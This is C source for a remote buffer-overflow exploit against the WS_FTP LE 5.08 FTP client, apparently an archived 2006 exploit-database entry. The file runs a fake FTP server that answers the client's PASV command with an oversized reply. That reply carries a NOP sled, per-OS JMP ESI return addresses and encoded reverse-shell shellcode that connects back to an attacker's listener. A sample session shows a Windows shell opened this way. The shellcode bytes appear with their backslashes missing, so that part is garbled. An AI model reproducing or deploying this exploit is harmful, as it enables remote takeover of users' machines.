# Title : WS_FTP LE 5.08 (PASV response) Remote Buffer Overflow Exploit
# Published : 2006-09-20
# Author : h07
/*
ws_exp.c
WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
Coded by h07 <h07@interia.pl>
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>ws_exp 1 192.168.0.1 4444
[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
[*] Coded by h07 <h07@interia.pl>
[+] Listening on 21
[+] Connection accepted from 192.168.0.3
[+] Client request: USER h07
[+] Client request: PWD
[+] Client request: SYST
[+] Client request: HELP
[+] Client request: PASV
[+] Sending buffer: OK
[*] Press enter to quit
C:\>nc -v -l -p 4444
listening on [any] 4444 ...
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
Microsoft Windows 2000 [Wersja 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\WS_FTP>
*/
#include <winsock2.h>   /* kept first: must be seen before any <windows.h> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
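/* TCP port the fake FTP server listens on; the victim client connects here. */
#define PORT 21
/* Size of the shared request/response buffer (the PASV payload is 1017 bytes). */
#define BUFF_SIZE 1024
/* Canned reply to every command before PASV; CRLF-terminated as FTP requires. */
#define RESPONSE "200 blah blah\r\n"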
/*
 * One exploitation target: a label shown in the usage list and the value
 * written into the return-address slot of the PASV reply (the original
 * annotations mark each one as a JMP ESI on that OS/language build).
 */
typedef struct
{
char os_name[32];   /* label printed by the usage text, e.g. "XP SP2 Polish" */
unsigned long ret;  /* address written as 4 little-endian bytes at offset 1011 of the reply */
} target;
char shellcode[] =
/*
win32 reverse shellcode (thx metasploit.com)
bad chars: 0x00 0x20 0x0a 0x0d 0x28 0x29
*/
"x2bxc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13x87"
"x61xbcxd8x83xebxfcxe2xf4x7bx0bx57x95x6fx98x43x27"
"x78x01x37xb4xa3x45x37x9dxbbxeaxc0xddxffx60x53x53"
"xc8x79x37x87xa7x60x57x91x0cx55x37xd9x69x50x7cx41"
"x2bxe5x7cxacx80xa0x76xd5x86xa3x57x2cxbcx35x98xf0"
"xf2x84x37x87xa3x60x57xbex0cx6dxf7x53xd8x7dxbdx33"
"x84x4dx37x51xebx45xa0xb9x44x50x67xbcx0cx22x8cx53"
"xc7x6dx37xa8x9bxccx37x98x8fx3fxd4x56xc9x6fx50x88"
"x78xb7xdax8bxe1x09x8fxeaxefx16xcfxeaxd8x35x43x08"
"xefxaax51x24xbcx31x43x0exd8xe8x59xbex06x8cxb4xda"
"xd2x0bxbex27x57x09x65xd1x72xccxebx27x51x32xefx8b"
"xd4x22xefx9bxd4x9ex6cxb0x87x61xbcxd8xe1x09xbcxd8"
"xe1x32x35x39x12x09x50x21x2dx01xebx27x51x0bxacx89"
"xd2x9ex6cxbexedx05xdaxb0xe4x0cxd6x88xdex48x70x51"
"x60x0bxf8x51x65x50x7cx2bx2dxf4x35x25x79x23x91x26"
"xc5x4dx31xa2xbfxcax17x73xefx13x42x6bx91x9exc9xf0"
"x78xb7xe7x8fxd5x30xedx89xedx60xedx89xd2x30x43x08"
"xefxccx65xddx49x32x43x0exedx9ex43xefx78xb1xd4x3f"
"xfexa7xc5x27xf2x65x43x0ex78x16x40x27x57x09x4cx52"
"x83x3exefx27x51x9ex6cxd8";
/* Request/response scratch space shared by the whole fake-server session. */
char buffer[BUFF_SIZE];

/*
 * Return addresses per OS/language build, indexed by the <system> argument
 * in the order the usage text prints them.  Each is the address of a
 * JMP ESI on that build (original author's annotation) and is the value
 * that ends up in the return-address slot of the PASV reply.
 */
target list[] =
{
    { "XP SP2 Polish",    0x7d16887b },   /* JMP ESI */
    { "2000 SP4 Polish",  0x776f2015 },   /* JMP ESI */
    { "XP SP2 English",   0x7cb9e082 },   /* JMP ESI */
    { "2000 SP4 English", 0x7848a5f1 },   /* JMP ESI */
    { "XP SP2 German",    0x7ca96834 }    /* JMP ESI */
};
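/*
 * Patch the connect-back IP and port into the global shellcode.
 *
 * The payload is XOR-encoded with key 0xd8bc6187 (the immediate in the
 * decoder stub at the start of shellcode[]), so the caller passes values
 * already XORed with that key (main() does inet_addr(...) ^ 0xd8bc6187 and
 * htons(...) ^ 0xd8bc).  What is written here is therefore the *encoded*
 * form; the placeholders it replaces are the key bytes themselves, i.e. an
 * encoded 0.0.0.0:0.
 *
 * ip   - IPv4 address as returned by inet_addr(), XORed with 0xd8bc6187.
 *        Only its low 4 bytes are copied, which assumes a little-endian
 *        host (the Win32 build this tool targets).
 * port - TCP port as returned by htons(), XORed with 0xd8bc.
 */
void config_shellcode(unsigned long ip, unsigned short port)
{
    enum {
        SC_IP_OFFSET   = 184, SC_IP_LEN   = 4,
        SC_PORT_OFFSET = 190, SC_PORT_LEN = 2
    };
    const size_t sc_len = sizeof(shellcode) - 1;

    /* Guard against the offsets drifting if shellcode[] is ever swapped out. */
    if ((size_t)(SC_IP_OFFSET + SC_IP_LEN) > sc_len ||
        (size_t)(SC_PORT_OFFSET + SC_PORT_LEN) > sc_len) {
        printf("[-] config_shellcode: placeholder offsets fall outside shellcode\n");
        return;
    }

    memcpy(&shellcode[SC_IP_OFFSET], &ip, SC_IP_LEN);
    memcpy(&shellcode[SC_PORT_OFFSET], &port, SC_PORT_LEN);
}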
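/*
 * Build the malicious PASV reply in out[]: "200 " + x86 xor eax,eax
 * (0x31 0xc0), the connect-back shellcode, a 0x90 NOP sled up to
 * RET_OFFSET, the 4-byte little-endian return address, then CRLF.
 * Returns the number of bytes to send (RET_OFFSET + 6), or 0 if out[] is
 * too small or the shellcode would run into the return-address slot.
 */
static size_t build_pasv_payload(char *out, size_t out_len, unsigned long ret_addr)
{
    /* 1011 = offset within the reply of the 4 bytes that land in EIP on
       the target (the value the original author found for WS_FTP LE 5.08). */
    enum { RET_OFFSET = 1011, PREFIX_LEN = 6, RET_LEN = 4 };
    const size_t sc_len = sizeof(shellcode) - 1;
    unsigned char ret_le[RET_LEN];
    int k;

    if (out_len < RET_OFFSET + RET_LEN + 3)      /* ret + "\r\n" + NUL */
        return 0;
    if (PREFIX_LEN + sc_len > RET_OFFSET)        /* shellcode would clobber ret */
        return 0;

    memset(out, 0x90, out_len);                  /* NOP sled fills the gap */
    memcpy(out, "200 \x31\xc0", PREFIX_LEN);
    memcpy(out + PREFIX_LEN, shellcode, sc_len);

    /* Store the return address byte-wise rather than through an
       (unsigned long *) cast: same little-endian bytes, but no misaligned
       or aliasing write and no dependence on sizeof(unsigned long). */
    for (k = 0; k < RET_LEN; k++)
        ret_le[k] = (unsigned char)((ret_addr >> (8 * k)) & 0xff);
    memcpy(out + RET_OFFSET, ret_le, RET_LEN);

    memcpy(out + RET_OFFSET + RET_LEN, "\r\n", 3);   /* CRLF + terminating NUL */
    return RET_OFFSET + RET_LEN + 2;
}

/*
 * Read one FTP command from the client into buf (NUL-terminated) and echo it.
 * Returns 0 on success, -1 if the peer closed the connection or recv failed.
 */
static int read_request(SOCKET cl, char *buf, size_t buf_len)
{
    int n;

    memset(buf, 0x00, buf_len);
    n = recv(cl, buf, (int)buf_len - 1, 0);      /* keeps room for the NUL */
    if (n <= 0) {
        printf("[-] Client went away before the session completed\n");
        return -1;
    }
    /* Raw client bytes are echoed as-is; the line break comes from the
       command's own trailing CRLF, if any. */
    printf("[+] Client request: %s", buf);
    return 0;
}

/*
 * Entry point.  Runs a fake FTP server on 0.0.0.0:PORT, answers the first
 * four client commands with RESPONSE, then replies to the fifth (PASV in the
 * WS_FTP LE 5.08 session shown in the file header) with the overflow payload
 * from build_pasv_payload(), using the return address of the chosen target.
 *
 * argv[1] target index (see usage), argv[2] connect-back IP, argv[3] port.
 * Returns 0 when the payload was sent, 1 on usage, -1 on any error.
 *
 * Caveats: the listener serves the first connection from anyone, so any FTP
 * client that connects receives the payload; the fifth command is not
 * required to be PASV (a warning is printed if it is not); and the return
 * addresses are specific to the listed OS/language builds.
 */
int main(int argc, char *argv[])
{
    WSADATA wsa;
    SOCKET sock = INVALID_SOCKET, cl = INVALID_SOCKET;
    struct sockaddr_in server, client;
    const int ntargets = (int)(sizeof(list) / sizeof(list[0]));
    int len, os, i, rc = -1;
    long port;
    unsigned long ip;
    size_t payload_len;

    printf("\n[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit\n");
    printf("[*] Coded by h07 <h07@interia.pl>\n");

    if (argc < 4) {
        printf("[*] Usage: %s <system> <connectback_IP> <connectback_port>\n", argv[0]);
        printf("[*] Sample: %s 0 192.168.0.1 4444\n", argv[0]);
        printf("[*] Systems..\n");
        for (i = 0; i < ntargets; i++)
            printf("[>] %d: %s\n", i, list[i].os_name);
        return 1;
    }

    os = atoi(argv[1]);
    if (os < 0 || os >= ntargets) {
        printf("[-] Error: unknown target %d\n", os);
        return -1;
    }

    ip = inet_addr(argv[2]);
    if (ip == INADDR_NONE) {
        printf("[-] Error: bad connect-back IP '%s'\n", argv[2]);
        return -1;
    }
    port = strtol(argv[3], NULL, 10);
    if (port < 1 || port > 65535) {
        printf("[-] Error: bad connect-back port '%s'\n", argv[3]);
        return -1;
    }

    /* The shellcode is XOR-encoded with 0xd8bc6187; pre-XOR the address and
       port so the decoder yields the real values at run time. */
    config_shellcode(ip ^ 0xd8bc6187UL,
                     (unsigned short)(htons((unsigned short)port) ^ 0xd8bcU));

    if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
        printf("[-] WSAStartup failed\n");
        return -1;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("[-] Socket error\n");
        goto out;
    }

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(PORT);
    if (bind(sock, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR) {
        printf("[-] Bind error: port %d in use or not permitted\n", PORT);
        goto out;
    }
    if (listen(sock, 1) == SOCKET_ERROR) {
        printf("[-] Listen error\n");
        goto out;
    }
    printf("[+] Listening on %d\n", PORT);

    len = sizeof(client);
    cl = accept(sock, (struct sockaddr *)&client, &len);
    if (cl == INVALID_SOCKET) {
        printf("[-] Accept error\n");
        goto out;
    }
    printf("[+] Connection accepted from %s\n", inet_ntoa(client.sin_addr));

    if (send(cl, "200 evil server ready :>\r\n", 26, 0) == SOCKET_ERROR) {
        printf("[-] Send error on banner\n");
        goto out;
    }

    /* WS_FTP LE sends USER, PWD, SYST and HELP before PASV (sample session in
       the file header); each gets the canned RESPONSE. */
    for (i = 0; i < 4; i++) {
        if (read_request(cl, buffer, BUFF_SIZE) < 0)
            goto out;
        if (send(cl, RESPONSE, (int)strlen(RESPONSE), 0) == SOCKET_ERROR) {
            printf("[-] Send error on response %d\n", i);
            goto out;
        }
    }

    /* Fifth command: expected to be PASV.  The original fired blindly; keep
       that behaviour but say so when the client deviated. */
    if (read_request(cl, buffer, BUFF_SIZE) < 0)
        goto out;
    if (strncmp(buffer, "PASV", 4) != 0)
        printf("[!] Fifth command is not PASV; sending the payload anyway\n");

    payload_len = build_pasv_payload(buffer, BUFF_SIZE, list[os].ret);
    if (payload_len == 0) {
        printf("[-] Payload does not fit in %d bytes\n", BUFF_SIZE);
        goto out;
    }
    /* Explicit length: do not rely on strlen() finding the NUL after CRLF. */
    if (send(cl, buffer, (int)payload_len, 0) != SOCKET_ERROR) {
        printf("[+] Sending buffer: OK\n");
        rc = 0;
    } else {
        printf("[-] Sending buffer: failed\n");
    }

    printf("[*] Press enter to quit\n");
    getchar();

out:
    /* Release both sockets and the Winsock library on every exit path. */
    if (cl != INVALID_SOCKET)
        closesocket(cl);
    if (sock != INVALID_SOCKET)
        closesocket(sock);
    WSACleanup();
    return rc;
}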